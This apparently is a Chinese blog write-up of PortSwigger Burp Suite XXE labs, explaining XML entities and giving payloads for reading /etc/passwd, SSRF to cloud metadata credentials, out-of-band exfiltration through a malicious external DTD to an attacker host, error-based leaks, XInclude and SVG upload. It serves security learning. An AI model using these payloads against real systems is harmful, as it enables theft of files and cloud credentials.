burpsuite靶场——XXE

最新推荐文章于 2024-03-05 20:00:27 发布
最新推荐文章于 2024-03-05 20:00:27 发布
阅读量989 收藏 1
点赞数
分类专栏: 刷题 wp 文章标签: 安全 json 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61768489/article/details/128443383
版权

文章目录

参考以下文章学习

https://xz.aliyun.com/t/3357

什么是XML?

XML全称是可扩展标记语言,是用来存储和传输数据的一种数据格式,结构上和HTML类似,但是XML使用的是自定义的标签名,XML在Web早期中比较流行,现在开始流行JSON格式的数据了。

什么是XML实体?

XML实体是一种表示数据项的方式,比如用实体< and >表示符号<和>,XML用实体来表示XML标签。

什么是文档类型定义(DTD)?

DTD全称是document type definition,其可以定义XML文档的结构、它可以包含的数据类型和其他项目。DTD在XML文档开头以可选DOCTYPE节点中声明。DTD可以在文档内部(内部DTD)或从其他地方(外部DTD)加载,也可以混合加载。

什么是XML自定义实体?

XML允许在DTD中自定义实体,例如
<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
如例所示,首先声明了一个名为foo的DTD,然后在DTD中声明了一个自定义实体,名为myentity,该自定义实体中的数据为”my entity value”,可以使用&myentity引用该自定义实体中的数据。

什么是XML外部实体?

XML外部实体也是一种自定义实体,它声明的在DTD之外,外部实体的声明使用SYSTEM关键字,然后指定加载实体值的URL,例如
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
URL也可以是使用file伪协议从而加载指定的文件内容,例如
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>
XXE漏洞就是利用这种特性获取敏感文件内容或者发动如命令执行、SSRF等攻击。

使用外部实体利用 XXE 来检索文件

image-20221224093745138

访问产品页面,单击“检查库存”,抓包

image-20221224094010426

然后就是构造外部实体来查看文件

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

productId数字替换为对外部实体的引用:&xxe;

image-20221224094837779

利用 XXE 执行 SSRF 攻击

image-20221224095804768

与上题payload类似

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin" > ]>
<stockCheck><productId>&ssrf;</productId><storeId>1</storeId></stockCheck>

image-20221224100213649

盲XXE漏洞

带外交互的盲 XXE

在指示的位置插入 Burp Collaborator 子域

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://3rvn4mhzwn9pcrg1hihcw1p25tbjz8.oastify.com"> ]>

productId用对外部实体的引用 替换数字:&xxe;

image-20221224111541419

收到响应

过 XML 参数实体进行带外交互的盲 XXE

因为常规外部实体被禁用了,所以我们可以尝试使用参数实体,可以这样构造payload

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://q0rv1h251nhi026ofywwp821ssyjm8.oastify.com"> %xxe; ]>

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://q0rv1h251nhi026ofywwp821ssyjm8.oastify.com"> %xxe; ]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

image-20221224112100104

利用盲 XXE 使用恶意外部 DTD 泄露数据

前面我们讲过可以利用XXE盲打进行带外交互,那么我们同样可以利用这个带外交互传输更多的内容,下面我们来看这样的一个例子

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

在本例中,我们首先声明了一个存储了敏感文件/etc/passwd内容的参数实体file,然后又声明了一个参数实体eval,里面又包含了一个参数实体exfiltrate,将参数实体file包含的数据附加在URL中发出带外请求从而泄漏带外数据。为了能成功加载上面内容,需要将内容封装成一个dtd托管在目标服务器上。例如

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://web-attacker.com/malicious.dtd"> %xxe;]>

这样我们就可以成功在目标服务器上加载XXE盲打的payload了。

image-20221224112458862

这题需要读/etc/hostname的内容,继续用dns外带

image-20221224113317777

服务端写入这样的内容

然后请求端写入payload如下,下面的url是恶意 DTD 的 URL,并非dns外带的url

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://exploit-0a3c001a047b5c97c16926a901c000a2.exploit-server.net/xxe.dtd"> %xxe;]>

image-20221224114008817

成功请求到file

利用盲 XXE 通过错误消息检索数据

的时候我们可以通过触发XML解析错误将敏感信息泄漏在报错信息中,例如

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

从上面我们能看到加载了一个不存在的文件触发XML报错,但是后面加载的file实体指定的文件是存在的,所以XML报错信息中就能泄漏这个文件的内容了,例如

java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

接下来我们通过一道在线靶场来深入理解

image-20221224114234348

与上题的payload类似

image-20221224114724632

加载一个不存在的文件来触发报错,并记下您的恶意 DTD 的 URL放入下面的payload中

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ae40000031ffda9c41c097e019d0097.exploit-server.net/xxe.dta"> %xxe;]>

image-20221224114935940

我们成功通过报错信息泄漏敏感文件内容了

利用 XInclude 检索文件

image-20221224103509535

XInclude攻击

有些应用程序的服务端会将从客户端接收的内容嵌入到XML文档中然后解析,这就导致因为我们无法控制整个XML文档而无法发动常规的XXE攻击,但是我们可以通过XInclude在该XML文档中构建子XML文档,想要使用XInclude我们需要引入相应的命名空间,所以XInclude攻击的payload长这样

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

抓包后是

image-20221224103627926

payload是

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

通过图像文件上传利用 XXE

image-20221224105529105

SVG 是一种基于 XML 语法的图像格式

image-20221224105608363

评论有个头像上传点,我们目的是通过上传payload的svg图像来执行命令

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

image-20221224105956077

可以看到头像成功回显出信息

image-20221224110049674

通过修改内容类型的 XXE 攻击

大多数 POST 请求使用由 HTML 表单生成的默认内容类型,例如application/x-www-form-urlencoded. 一些网站希望接收这种格式的请求,但会容忍其他内容类型,包括 XML。

例如,如果一个普通请求包含以下内容:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

然后您可以提交以下请求,并得到相同的结果:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

如果应用程序容忍消息正文中包含 XML 的请求,并将正文内容解析为 XML,那么只需将请求重新格式化为使用 XML 格式,您就可以到达隐藏的 XXE 攻击面。

ThnPkm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP之XXE漏洞靶场详解
sixoneyvye的博客
12-09 3951
PHP之XXE漏洞靶场详解 00x1 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 00x2 XML基础知识 XML是一...
BurpSuite使用介绍(一)
02-21
BurpSuite是用于攻击web应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大...
burpsuit 靶场( HTTP request smuggling)
wanan的博客
01-22 1771
burpsuit 靶场( HTTP request smuggling)
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
liaomin416100569的专栏
12-13 9397
渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
Burpsuite靶场——文件上传漏洞
小林说安全的博客
05-12 4090
Burpsuite YYDS!!! Portswigger是著名神器Burpsuite的官方网站,实际上也是一个非常好的漏洞训练平台。
Burp Suite 社区版(burpsuite_community_v2022.5.1.jar)
06-20
Burp Suite 社区版(burpsuite_community_v2022.5.1.jar),Burpsuite用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并...
BurpSuite手册-016-Burp Suite tools-inspector
07-01
本人自己翻译的Burp Suite 专业版的中文手册,陆续更新,请期待
burpsuite3个月试用版
01-19
burpsuite3个月试用版
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 .pdf
09-05
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 安全防御 大数据 安全管理 安全威胁 漏洞挖掘
XXE漏洞靶场复现
weixin_63124284的博客
10-19 822
XXE也叫XML(可扩展标记语言)外部实体注入,然后我们这里拆开来解释!!! 外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。 注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。 因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。
Burp Suite靶场练习——暴力破解(pikache靶场
p36273的博客
06-05 4285
靶场一共有4关,现我们就开始通关吧。Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。Token 完全由应用管理,所以它可以避开同源策略Token 可以避免 CSRF 攻击Token 可以是无状态的,可以在多个服务间共享BurpSuite爆破的几种模式攻击模式。
一次奇特的应急响应
最新发布
qq_50765147的博客
03-05 1409
ps:在hosts文件中手动添加了一个域名与其对应的IP地址映射后,操作系统在处理对该域名的请求时,会优先查询hosts文件而不是向DNS服务器发起请求。
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1336
Apache Log4j2漏洞
burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
黑夜的猎杀-盲打XXE
weixin_30699955的博客
01-06 247
在进入正文前,我想告诉大家,文章没有涉及任何XXE攻击的任何新技巧,这只是我遇到的一个案例,我只想分享给大家。 简短的摘要是非常重要的: 在对后台一无所知的情况下发现了一个XXE漏洞,该漏洞没有返回任何数据或者文件,这就是盲打XXE 使用盲打XXE进行基于报错的端口扫描 成功的外部交互正常进行 充分利用了盲打XXE识别了后端系统的文件 身为渗透测试人员,我每天都的学习都很充...
Vulnhub-XXE靶场
hackerXxxt的博客
08-18 281
4.从抓取中的数据包可以看出admin.php是在xxe的目录下面,所以我们打开192.168.200.131/xxe/admin.php页面,将刚刚获取到的账号密码输入。2. 打开burp suite,抓取登录页面的数据包,可以看到XML的格式,这里就可以看出我们所要攻击的XXE漏洞了。(在线php的网站各有差异,我刚开始找的都没有显示出来,还以为是我的数据弄错了,后面试了很多个才找到可以运行出的)将读取到的数据发送到Decoder下,使用base64解密,可以得到账号和密码,密码用md5解密可以得到。
XXE——针对站点渗透
m0_65544268的博客
07-26 347
对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5先进行base32解码在进行base64解码得到。可以扫描到80端口是开放的,使用的中间件是Apache,以及网站根目录下有哪些文件。同时我们还可以发现flag存在于/flagmeout.php文件中。密码做了一个md5加密,尝试对密码进行md5的解密。输入账号:admin,密码:123,进行抓包。5)访问/etc/.flag.php文件。1)准备我们的bp抓包工具进行抓包。将得到的数据进行base64转码。3)访问admin.php文件。
burpsuite靶场
09-14
Burp Suite靶场是一套用于测试和演示网络安全的目标应用程序集合。这个靶场旨在帮助安全专业人员在实践中提高他们的技能,并提供一个安全的环境来测试和演示各种攻击和漏洞利用技术。 在Burp Suite靶场中的客户端漏洞篇,主要涵盖了基于DOM的漏洞。DOM(Document Object Model)是一种用于处理HTML和XML文档的编程接口。基于DOM的漏洞是由于Web应用程序对用户提供的输入数据进行不充分或不正确的处理而引起的。这些漏洞可能导致跨站脚本攻击(XSS)和其他安全问题。 爆破当前数据库信息(--current-db)和爆破所有数据库信息(--dbs)是使用sqlmap工具的示例命令。sqlmap是一款专门用于检测和利用SQL注入漏洞的工具。通过提供目标URL和必要的参数,sqlmap可以自动扫描并利用可能存在的SQL注入漏洞。这些命令用于获取目标应用程序的数据库信息,从而了解目标系统的底层结构。 总之,通过Burp Suite靶场中的客户端漏洞篇和sqlmap工具的使用,安全专业人员可以更深入地了解和测试基于DOM的漏洞以及利用SQL注入漏洞获取数据库信息的技术。这些技术和知识对于安全评估和漏洞挖掘非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值